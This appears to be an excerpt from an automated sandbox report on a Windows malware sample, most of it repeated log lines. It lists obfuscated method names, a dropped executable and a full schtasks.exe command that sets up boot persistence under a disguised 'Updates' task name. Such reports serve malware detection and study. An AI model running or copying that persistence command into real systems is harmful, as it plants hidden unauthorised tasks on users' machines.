Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, Oh18DpMJxd1RorJDml.cs	High entropy of concatenated method names: 'sQT91KHQQR', 'bUy9A0TIHi', 'IfO9SM5vKl', 'rZ89aYyMtn', 'P499QQDUwX', 'glr9I3APHw', 'gb9mEAFyOpc2g3LNEG', 'urA3t83doKi3IZ0cqh', 'PFH99Ukskj', 'aEA9Rsb8Ja'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, F0NYdnjy3hfsm0m0Te.cs	High entropy of concatenated method names: 'ToString', 'vb6IB3ogmx', 'fxcIEwWGPY', 'K2nIhREfVc', 'yWCIVmWYbi', 'pnrIOto74A', 'wr2It9D8lJ', 'F4cI5nrJUD', 'qMLIXO2DrA', 'OZ7Imnrawg'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, oCorf3Al2NefSCs3QA.cs	High entropy of concatenated method names: 'NBXRJZ4OXb', 'KVbRiqqijO', 'va0R6PD0FC', 'denRGhmQeY', 'BQ5RZ5PQlt', 'jD2RejqMIy', 'lJTR1H5Jl5', 'lI4RAD2jTO', 'ttoRPMyD6R', 'CLqRSdjwLL'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, AygIplkRcrT4IwnNXM.cs	High entropy of concatenated method names: 'T618Idh22', 'OwcpXu0Wn', 'x1RbBarns', 'cLiFaT3eV', 'HaTxbsofI', 'tCh2fIwnG', 'qV7MqH5khmKavJ4p4F', 'HHA8P00dN1b2Cyg98q', 'rHnqaPQ43', 'JGMWPy4uE'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, IL5ZxtrWeBoXNMfO2P.cs	High entropy of concatenated method names: 'XaZsQUMYAF', 'VWnsHE5ttH', 'rdcss6Y1t4', 'KoJscELp23', 'CfasUUPGdp', 'MybsvVekHg', 'Dispose', 'T8jqiB689M', 'LHlq60tWa9', 'MqOqGx9pGI'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, Q38RwVnNr6j6mspOqE.cs	High entropy of concatenated method names: 'FSNsdo50UR', 'hNXsE9M5m6', 'Srash3TSfl', 'z7usVWhBer', 'caKsO3xR3v', 'TOastQdWYO', 'HSWs5VvRdW', 'vNBsXshPTF', 'mi6smqjAun', 'Lr8sYPMBVX'
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, frIYUk9RLyC8CVLwsVf.cs	High entropy of concatenated method names: 'mMGcL3bvUa', 'H3bczJ1ZVM', 'VNHg7VI3nu', 'HVrqhOnaFJuvMj72G7c', 'ogBiqKnqM5i68TP4D1r', 'UEWCeWnz9IiNfxXSlsq', 'l1GG6wCf8C9AnWlijUS'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, RmaLLYzExuPKiT82FS.cs	High entropy of concatenated method names: 'xvOWbV5UsI', 'pNtWTvjI3Z', 'NDTWx5ckky', 'ofQWdBUk4X', 'sDlWEy7yZn', 'qAsWVy2BIM', 'dptWOi8usr', 'TmyWv1uqkp', 'UvTW4U8cNf', 'v0mWycw68e'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, d4wf5A9MkTVdZB3iBfd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UtYgsH4VNl', 'H5EgWK6yUg', 'bvugc1oAPe', 'lpoggkeADF', 'eqxgUdY5cK', 'kgBgwXGbb6', 'UPYgvRVYv5'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, rfAwRg5tlZ2QnZqx6Z.cs	High entropy of concatenated method names: 'cgT1iKnDMs', 'IlJ1G66EQQ', 'nfc1e6bj4H', 'Q5XeL2iSXT', 'jSfezxy7Yk', 'tyl17ekb0P', 'rOP19EWIPv', 'C451koHsEY', 'oP51RIFDUb', 'M7Q1MopISl'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, bevMgBNvGXuLsK3L0W.cs	High entropy of concatenated method names: 'BP1HDHhtgJ', 'eoZHLkFWjc', 'Srwq7dxNA4', 'rhMq9qjFNv', 'W0FHBM6El7', 'vPKHlJ5Uyp', 'WZPHCjxKGS', 'BufH3LqEw1', 'B0mHuge2ng', 'xDCHjRrtQM'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, Dtj59wCCtMLqlhMnQl.cs	High entropy of concatenated method names: 'J0WKT8ywTc', 'GKnKxmHBYE', 'GqFKdwmcno', 'lIRKEQr4dD', 'FnaKV0KBEj', 'WExKOhevhK', 'cjjK5c3uqK', 'YQjKX1Wke2', 'KeIKYtFFTA', 'fKxKBWHPgL'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, usGuR399MTyQxj0PXCL.cs	High entropy of concatenated method names: 'JSBWL6oXRv', 'BN8Wz3yQUL', 'f55c7T9HYX', 'iSVc94QUcL', 'kBXckdN0RB', 'Js1cRXFCTd', 'SDRcMZjMrd', 'ccbcJaCTFE', 'ANecisE2iL', 'AmCc6LoJbb'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, yMtnZb2pdA1I8l49QD.cs	High entropy of concatenated method names: 'D7AZf20bEc', 'HGTZFdTVRu', 'jJtGhJm456', 'zdAGVSy01u', 'tLAGO5xqbh', 'g0xGtTP5gN', 'Ut6G5P8vX9', 'xQZGXGB4AR', 'zvxGmiW1uR', 'PqaGYQKoC4'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, fwYt32o8W6e1sYmQcc.cs	High entropy of concatenated method names: 'VccHSc8Heo', 'TNHHaklYWd', 'ToString', 'yt1HibyuTZ', 'WDcH6hDvRL', 'aX9HG6hc41', 'JudHZsXcKK', 'YymHeEI6m6', 'fMuH1xNIQM', 'aDNHAMSwCU'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, N7xk8D6c5GktxMsRcb.cs	High entropy of concatenated method names: 'Dispose', 'OoX9nNMfO2', 'qc7kEbMLe2', 'mE5xho0YNv', 'k2A9Lt9nTv', 'vud9zWCeyy', 'ProcessDialogKey', 'O8Ck738RwV', 'Vr6k9j6msp', 'JqEkk0q0Mx'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, DKHQQRT9Uy0TIHiZru.cs	High entropy of concatenated method names: 'Jp163ShW3p', 'SF46unHnDT', 'uKi6jUWy3Y', 'MUW6oyLGCc', 'xX360Xb1VR', 'QPn6NPBCyQ', 'AvN6rBd3Dt', 'QcJ6D80IbV', 'QfR6n0A6Ku', 'Uh26Lblm5m'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, iHwuKy3LKTyd5q9ICw.cs	High entropy of concatenated method names: 'BlGQYUiyPY', 'BZfQlp9aAX', 'Cq4Q3geEYo', 'zG1Qu8JWPt', 'rTYQEWXUVV', 'IMWQhMNYna', 'nmxQVMFH0n', 'xyyQOLH0H7', 'pMPQtWQn2c', 'LOmQ5cMAXr'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, nSl3H3mLhOOMkse8aU.cs	High entropy of concatenated method names: 'TGY14UMFpf', 'kKW1ydrnZw', 'G6U18PYnWW', 'FYf1pXlvnR', 'dm71ft3A6i', 'cFF1bGbkDS', 'hRd1FRjcIu', 'UbL1T3k7fw', 'KDN1xga1J6', 'Nf612ti2NH'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, vwX6lrd3APHw1t0EhA.cs	High entropy of concatenated method names: 'DoleJjBfPh', 'yCae6u4RxT', 'XEgeZyyvI4', 'QmZe1esEnP', 'kT1eAnwu61', 'EkSZ0UQgF2', 'K2SZN8FBKk', 'm8vZr0CPIY', 'tDMZDVrJxu', 'uJyZnlSpEc'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, wG4PQhxfOM5vKlsZ8Y.cs	High entropy of concatenated method names: 'OMTGpmhfSf', 'cDqGbcBFqT', 'XmTGTKqdZv', 'j63GxIo8uw', 'zWWGQhysyA', 'pF0GIsAwOL', 'vUfGHeomEE', 'X8FGqElK68', 'MIVGskpywF', 'DhSGWYh7nL'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, Oh18DpMJxd1RorJDml.cs	High entropy of concatenated method names: 'sQT91KHQQR', 'bUy9A0TIHi', 'IfO9SM5vKl', 'rZ89aYyMtn', 'P499QQDUwX', 'glr9I3APHw', 'gb9mEAFyOpc2g3LNEG', 'urA3t83doKi3IZ0cqh', 'PFH99Ukskj', 'aEA9Rsb8Ja'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, F0NYdnjy3hfsm0m0Te.cs	High entropy of concatenated method names: 'ToString', 'vb6IB3ogmx', 'fxcIEwWGPY', 'K2nIhREfVc', 'yWCIVmWYbi', 'pnrIOto74A', 'wr2It9D8lJ', 'F4cI5nrJUD', 'qMLIXO2DrA', 'OZ7Imnrawg'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, oCorf3Al2NefSCs3QA.cs	High entropy of concatenated method names: 'NBXRJZ4OXb', 'KVbRiqqijO', 'va0R6PD0FC', 'denRGhmQeY', 'BQ5RZ5PQlt', 'jD2RejqMIy', 'lJTR1H5Jl5', 'lI4RAD2jTO', 'ttoRPMyD6R', 'CLqRSdjwLL'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, AygIplkRcrT4IwnNXM.cs	High entropy of concatenated method names: 'T618Idh22', 'OwcpXu0Wn', 'x1RbBarns', 'cLiFaT3eV', 'HaTxbsofI', 'tCh2fIwnG', 'qV7MqH5khmKavJ4p4F', 'HHA8P00dN1b2Cyg98q', 'rHnqaPQ43', 'JGMWPy4uE'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, IL5ZxtrWeBoXNMfO2P.cs	High entropy of concatenated method names: 'XaZsQUMYAF', 'VWnsHE5ttH', 'rdcss6Y1t4', 'KoJscELp23', 'CfasUUPGdp', 'MybsvVekHg', 'Dispose', 'T8jqiB689M', 'LHlq60tWa9', 'MqOqGx9pGI'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, Q38RwVnNr6j6mspOqE.cs	High entropy of concatenated method names: 'FSNsdo50UR', 'hNXsE9M5m6', 'Srash3TSfl', 'z7usVWhBer', 'caKsO3xR3v', 'TOastQdWYO', 'HSWs5VvRdW', 'vNBsXshPTF', 'mi6smqjAun', 'Lr8sYPMBVX'
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, frIYUk9RLyC8CVLwsVf.cs	High entropy of concatenated method names: 'mMGcL3bvUa', 'H3bczJ1ZVM', 'VNHg7VI3nu', 'HVrqhOnaFJuvMj72G7c', 'ogBiqKnqM5i68TP4D1r', 'UEWCeWnz9IiNfxXSlsq', 'l1GG6wCf8C9AnWlijUS'

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

File created: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
